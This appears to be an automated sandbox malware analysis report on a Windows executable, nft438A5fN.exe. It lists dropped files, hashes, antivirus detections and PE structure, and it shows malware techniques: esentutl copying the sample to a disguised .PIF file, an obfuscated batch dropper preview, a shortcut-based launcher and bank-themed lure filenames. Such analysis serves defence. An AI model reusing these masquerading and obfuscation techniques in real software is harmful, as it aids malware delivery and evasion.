                                                                    Size (bytes):8378
                                                                    Entropy (8bit):3.701673140123279
                                                                    Encrypted:false
                                                                    SSDEEP:192:R6l7wVeJeL6M6Ya36A/64gmfbNfxYprB89bXTsfAdm:R6lXJy6M6Ya6A/lgmfbNfFX4fX
                                                                    MD5:FFEC970F7D345CEB383A1344EB429D0B
                                                                    SHA1:33CDA6E0248E0E7E4ABEF5A484E534B86B9908BA
                                                                    SHA-256:69F4E6A294C8FBB71F659DA76817EB32391DD323AC49F09FAFB5A71AC98188BB
                                                                    SHA-512:7F570AEEA7F101D697866E976D5447D0338BCEDC54F18EF8479A43657C1893409F1831660CC829D8C91EF203E86B375A429B2A4BA2D9236F76EB2CA0EBBC24E6
                                                                    Malicious:false
                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.7.6.<./.P.i.
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4680
                                                                    Entropy (8bit):4.490544636926762
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwWl8zsoJg77aI9rIWpW8VYlvYm8M4JgKJFGZ+q8fLlzPd73d:uIjfuI7xh7VtJgZZSpZ73d
                                                                    MD5:1ED9D975D08F67D552B0DB7E78755FC1
                                                                    SHA1:A4EFC3322531D305EB6F9AC03AEF8414FC35760C
                                                                    SHA-256:F14F65A6252BEB4EC9B4AC3330DE7EA398F0AD0AC34E85D07C8670DECCD71222
                                                                    SHA-512:54772F4B39881B8B77BB081601437F7953F2FCC78D94130069D7879BE36FB8A44976EEA4A6A800724D3033CC722EBC68DCE83A5B7AEEC181408E8243AC06735A
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="604695" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Tue Nov 26 07:12:51 2024, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):42442
                                                                    Entropy (8bit):2.0707634709293115
                                                                    Encrypted:false
                                                                    SSDEEP:192:VZMUXFX9/2VobqOiBrSUqS3NyASFEWjESZurtLHFGOY/dly:TL+ib12SJkNybFHZuxw/dly
                                                                    MD5:76760AA35BE69277AABD02EF9765C709
                                                                    SHA1:5115F1B60468B49E58C19670400AD2816C09CBBE
                                                                    SHA-256:BBC05D3FFE1C8B8241FDB61974F02D24DCCDB1522EA229C03D7A7D80E47958E8
                                                                    SHA-512:227D7E5A75D153F2A26F00F319E44CEF79257C8881BB323144440C678DB5ACE10D7E82E167B2582319D34B214293B4EF584F23370D9BE1E3FE20FFA25E5F32D2
                                                                    Malicious:false
                                                                    Preview:MDMP..a..... ........tEg.........................................*..........T.......8...........T......................................l...............................................................................eJ..............GenuineIntel............T.......`....tEg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8382
                                                                    Entropy (8bit):3.7015046563241127
                                                                    Encrypted:false
                                                                    SSDEEP:192:R6l7wVeJeJ6PE6YaK6A/24gmfbJhSpDZ89bSTsf+bGm:R6lXJg686YH6A/ZgmfbJh5S4fo
                                                                    MD5:304B3F4AE34EFA6DDE43A344E8392138
                                                                    SHA1:58F9F102F75BB77D83B89158BE068B01F1121AF3
                                                                    SHA-256:1370DAD663149BA599A7095E57A772ADA657A972A00584D052EDB1D76F0C0DC6
                                                                    SHA-512:D40FF859EC14D30BD9E158805C9AAC27FF0049F89F7A64934D74AB2A0C753FF93883AB52320ECDF4ADC72A02C41A7E9553EB29C0E6DE93F4B49CE43D831F92B0
                                                                    Malicious:false
                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.7.6.<./.P.i.
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4684
                                                                    Entropy (8bit):4.488275185548259
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwWl8zsoJg77aI9rIWpW8VYBPYm8M4JgKq8NOqFZ+q8fvvgNObzPd73d:uIjfuI7xh7VhJghAlSvcEZ73d
                                                                    MD5:5C67EBF630D1EB0E2031B86240B87928
                                                                    SHA1:C58B50811EC01910E431FF5319242E6439FEEF42
                                                                    SHA-256:1E75C062BF7CBAE47A9B37F37CADF5FA085A91C120B0CA9A9FA5F2B81C27A950
                                                                    SHA-512:A3AE6BECCB13930A4338D5A25B6D9DA82F9B235DCD9041015680CC6B314E48AC3C8C6FB341C66D865104DB98B035D3D2FF79137716E5DC04567C6FE1188F1098
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="604695" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                    Process:C:\Users\user\Desktop\nft438A5fN.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4
                                                                    Entropy (8bit):2.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:Jn:Jn
                                                                    MD5:17A1D5E252F7DEA2B5162C7E8CE55239
                                                                    SHA1:0796EB344F59291ECB828FB4307BF831314A72DC
                                                                    SHA-256:8C094FA7A36D960F46EB971614F084207C9A037D28C4B42B622F887EFE455D99
                                                                    SHA-512:2DE9E6087141362BF25773C77FADB788B5A88A8FB55373848C044C6DE62ACEC8905588610A1CDACB746A4AD3F93B4415A09B05A868650B13CE8114F2AE1CFC8E
                                                                    Malicious:false
                                                                    Preview:47..
                                                                    Process:C:\Users\user\Desktop\nft438A5fN.exe
                                                                    File Type:OpenPGP Public Key
                                                                    Category:dropped
                                                                    Size (bytes):838507
                                                                    Entropy (8bit):7.209014553711061
                                                                    Encrypted:false
                                                                    SSDEEP:24576:jd5ZkzD4mqRJoxR//LpKKxrRLhazb/ncVkvi+R:OzDPxNJtuPKKi+R
                                                                    MD5:864518C2AAECE1BCAABEC65C2F3A9926
                                                                    SHA1:43685959B153D4BBE722D57B227ABB3614483E7C
                                                                    SHA-256:F896A2CE7170D361C69C487E2A04F41408F4241BB42630574DFE09CE94832B5D
                                                                    SHA-512:5D12C0B9F2AF1CB85899A20E262FF880A3CEFDD76CE598D6FC08C4D9809ABB30228E815FED21DF568D9194077378C5A989985580FD1D5900A7625EA2CD7C5B50
                                                                    Malicious:true
                                                                    Preview:...N...@..............................................................................................................................N...@..............N...@............i._...Q1|.17M...&.-......}%....).H..~J...$.^..OA!.!O.^.........<..T.oD.....n...\...2.E....&.I.y..zH..M.gL....O.qR.U.....7...(...UJ.....VHL...'DCVe..8.M...o..R..._../.D..t^....9IDp.....n:W.'.-.h..\MO...)H9....F.._..@.;.DW.J.....Q..*.O:-O0.H:.]H.9CG'%...#.F.,.F./B..1.2.D..m..9IJ/EI..2....V.%.A....f.mI.{..e.C..Is....{.H..7wn....Fl/..]b.kD..XF..2T.......4.E$.tH.N.cF.>....Y..p3..%..j.N..;E..cC.....V.....N........#k^..(.@..............Y(m....aV..3F..._.q(..&.v..:.6....w..7.F(.H./.^..[.m....o.1......G...........%.......'GJ..o$Z....k....n.V..N..^...VN.M.QG....W..&...(.d.U...@.rnf........#...sI...&...].3.....2...../.D.o.l..[........dO....O.7.A...2....7.H..lg.....s...tV.w...~...U..Q.~..........U^.+OE....\...f....6w...,...k@KBv...aB.iL....q.......Gb.
                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1244672
                                                                    Entropy (8bit):7.217395439367395
                                                                    Encrypted:false
                                                                    SSDEEP:24576:2o8jIfzBmV+MtCxqwFs0beRsSn8T788CRNM:2wf8BZn8TY5
                                                                    MD5:1A4D920B70293F85958A9A2CDE581F6F
                                                                    SHA1:756015AE8F1B03F14BC1126E6B2183A383631186
                                                                    SHA-256:02EEC111BA55308C1D91C49EE08CB2D6C00D50893596CEEF03F7664403175617
                                                                    SHA-512:CEAE945E81F37BB3EA8B52177801FD9921B84B63FBB07CAC8877544B21DCEE136344348ADAF09C43D392D1D0B738B5B941E28F96574A8503167B4D00D3C67A2F
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 58%
                                                                    • Antivirus: Virustotal, Detection: 68%
                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................J......T.............@..............................................@...............................%..............................lf...................................................................................text...t........................... ..`.itext.............................. ..`.data..............................@....bss.....6...........`...................idata...%.......&...`..............@....tls....4................................rdata..............................@..@.reloc..lf.......h..................@..B.rsrc...............................@..@....................................@..@................................................................................................
                                                                    Process:C:\Users\user\Desktop\nft438A5fN.exe
                                                                    File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):62357
                                                                    Entropy (8bit):4.705712327109906
                                                                    Encrypted:false
                                                                    SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                    MD5:B87F096CBC25570329E2BB59FEE57580
                                                                    SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                    SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                    SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                    Malicious:true
                                                                    Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .
                                                                    Process:C:\Users\user\Desktop\nft438A5fN.exe
                                                                    File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Wuqtggvo.PIF">), ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):104
                                                                    Entropy (8bit):5.1832238533158925
                                                                    Encrypted:false
                                                                    SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMMLIsbxzoPYv:HRYFVmTWDyzpsExzoPC
                                                                    MD5:000F5057DD458226A681D694D834A61F
                                                                    SHA1:E362607B872F49D1ABD195FF6B58B2D55BBDE539
                                                                    SHA-256:C1977F492C8A48A643E8950C7BB1B3B719A64FC3414EC0BDE950A45108983D6D
                                                                    SHA-512:123BE44C31B1DC090934C48E8D59D4C5FE1F920D71336593E0742563F6E371C470ADD254BCA62F8A26A92F6EA231B93743E702867EECF8F41AD93326C853F7C0
                                                                    Malicious:true
                                                                    Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Wuqtggvo.PIF"..IconIndex=962230..HotKey=19..
                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):236544
                                                                    Entropy (8bit):6.4416694948877025
                                                                    Encrypted:false
                                                                    SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                    MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                    SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                    SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                    Malicious:false
                                                                    Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
• Filename: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat, Detection: malicious
• Filename: IBKB.vbs, Detection: malicious
• Filename: USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe, Detection: malicious
• Filename: USD470900_COPY_800BLHSBC882001.PDF.bat, Detection: malicious
• Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious
• Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious
• Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious
• Filename: x.exe, Detection: malicious
• Filename: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd, Detection: malicious
• Filename: Árajánlat kérés MOL093478524·docx.exe, Detection: malicious
                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18944
                                                                    Entropy (8bit):5.742964649637377
                                                                    Encrypted:false
                                                                    SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                    MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                    SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                    SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                    SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                    Malicious:false
                                                                    Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                    Category:dropped
                                                                    Size (bytes):1835008
                                                                    Entropy (8bit):4.372891531471667
                                                                    Encrypted:false
                                                                    SSDEEP:6144:5FVfpi6ceLP/9skLmb08yWWSPtaJG8nAge35OlMMhA2AX4WABlguN8iL:vV1qyWWI/glMM6kF7aq
                                                                    MD5:626D8717F3E7E21039967F7D6F41C763
                                                                    SHA1:40C2616DB3DFE75DE18A08C446924BF670CACD27
                                                                    SHA-256:59E03BD370EB4CD18DE4CD773D53CF87C52284B5B0A609C8ECB4DC3DD64B44E7
                                                                    SHA-512:0BC19C20F0ED2D6CF10C4080D72F01BC4AACF68BF1368FECE8D1C7CAE9E5233E2871486BC52DA5729479ACACE57DFF013B2F56D47EFA750438007D795881648D
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                    Category:dropped
                                                                    Size (bytes):591
                                                                    Entropy (8bit):4.677517157262383
                                                                    Encrypted:false
                                                                    SSDEEP:12:qL1xTzAeSbZ7u0wxDDDDDDDDjCaY5yemlaYAmVV4TB8NGNt:+1xTzAp7u0wQakyDlag/4t8N2
                                                                    MD5:3B12CE324B1724A35CE83A7E4AF2D3AD
                                                                    SHA1:49E2BE1BC9C6750E55E0A36651ACA814CDE99232
                                                                    SHA-256:A2EA6C0DEA1DFF281DD18E008AD7BA5FCC64B4CA3A057EEB716360176FEDC4C8
                                                                    SHA-512:6073B1D545BF646C073B7D54A8BFDAF11937041D3020DAF330333B368C7FF47AF738F383D1399B4EE0F8ECCD3C8DF2143E66E2DA47FC5794E5078536D00EAA6D
                                                                    Malicious:false
                                                                    Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\Desktop\nft438A5fN.exe...Destination File: C:\\Users\\Public\\Libraries\\Wuqtggvo.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x12fe00 (1244672) (1 MB)....Total bytes written = 0x130000 (1245184) (1 MB).......Operation completed successfully in 0.157 seconds.....
                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                    Category:dropped
                                                                    Size (bytes):560
                                                                    Entropy (8bit):4.531408806270406
                                                                    Encrypted:false
                                                                    SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGN2FI:/p4xT5cp7u0wQakB4aV4t8N0
                                                                    MD5:EE7187E169AF0EDE104977788ECC390D
                                                                    SHA1:5A796ECD0808A540F708BFA4C43FF5295B324F23
                                                                    SHA-256:2E0D33DC849A7490058C38486E17F33365411663130ABCBDBA5A2293646B07CB
                                                                    SHA-512:53ED16BD667612A24E5840B86902ABCE2E4C2B22471CBE3923490448719CE1F0D48DCD2D8DF38F66F572C4EE39CFE5C52190BBDD2B3237F5C38CE556C2ED8C8D
                                                                    Malicious:false
                                                                    Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.47 seconds.....
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.217395439367395
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                    • Windows Screen Saver (13104/52) 0.13%
                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    File name:nft438A5fN.exe
                                                                    File size:1'244'672 bytes
                                                                    MD5:1a4d920b70293f85958a9a2cde581f6f
                                                                    SHA1:756015ae8f1b03f14bc1126e6b2183a383631186
                                                                    SHA256:02eec111ba55308c1d91c49ee08cb2d6c00d50893596ceef03f7664403175617
                                                                    SHA512:ceae945e81f37bb3ea8b52177801fd9921b84b63fbb07cac8877544b21dcee136344348adaf09c43d392d1d0b738b5b941e28f96574a8503167b4d00d3c67a2f
                                                                    SSDEEP:24576:2o8jIfzBmV+MtCxqwFs0beRsSn8T788CRNM:2wf8BZn8TY5
                                                                    TLSH:4B45ADC325634B2FCAF1C979A8569A6464147DE22B247F4FF5B3718C9F252C0BC39A12
                                                                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                    Icon Hash:61c4ad0e33096c74
                                                                    Entrypoint:0x45c754
                                                                    Entrypoint Section:.itext
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                    DLL Characteristics:
                                                                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:b679c9cad73e147b0713738ca714f5d5
                                                                    Instruction
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    add esp, FFFFFFF0h
                                                                    mov eax, 0045B544h
                                                                    call 00007F05F10340C9h
                                                                    mov eax, dword ptr [00467940h]
                                                                    mov eax, dword ptr [eax]
                                                                    call 00007F05F108189Dh
                                                                    mov ecx, dword ptr [00467A30h]
                                                                    mov eax, dword ptr [00467940h]
                                                                    mov eax, dword ptr [eax]
                                                                    mov edx, dword ptr [0045AEC0h]
                                                                    call 00007F05F108189Dh
                                                                    mov eax, dword ptr [00467940h]
                                                                    mov eax, dword ptr [eax]
                                                                    call 00007F05F1081911h
                                                                    call 00007F05F1032150h
                                                                    lea eax, dword ptr [eax+00h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6c000 | 0x2500 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x78000 | 0xc0e00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x71000 | 0x666c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x70000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x6c6f0 | 0x5c4 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5a774 | 0x5a800 | 7c9ce1d733bbc429171d5167d6681480 | False | 0.5200222289364641 | data | 6.522741624839106 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x5c000 | 0x79c | 0x800 | 6e4a44453cf9bbde15103dda026c0a58 | False | 0.60498046875 | data | 6.100900928490729 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x5d000 | 0xaacc | 0xac00 | 9cc769e166ed870f93f4e2def065e518 | False | 0.08287154796511628 | data | 5.8144016898189 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x68000 | 0x36c4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6c000 | 0x2500 | 0x2600 | 95282f58a0dda4b5380f300a1f41284c | False | 0.31938733552631576 | data | 5.125844410171861 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x6f000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x70000 | 0x18 | 0x200 | 678a973f6de20f6c8b027c1addc26f02 | False | 0.05078125 | data | 0.19586940608732903 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x71000 | 0x666c | 0x6800 | 8dc19538a3a6bfdbbea2abadab490aa4 | False | 0.6361177884615384 | data | 6.665561766810042 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x78000 | 0xc0e00 | 0xc0e00 | d322748776c5ee5d78abdc4829f96a3e | False | 0.5445775781756319 | data | 6.983878399808079 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x78b8c | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
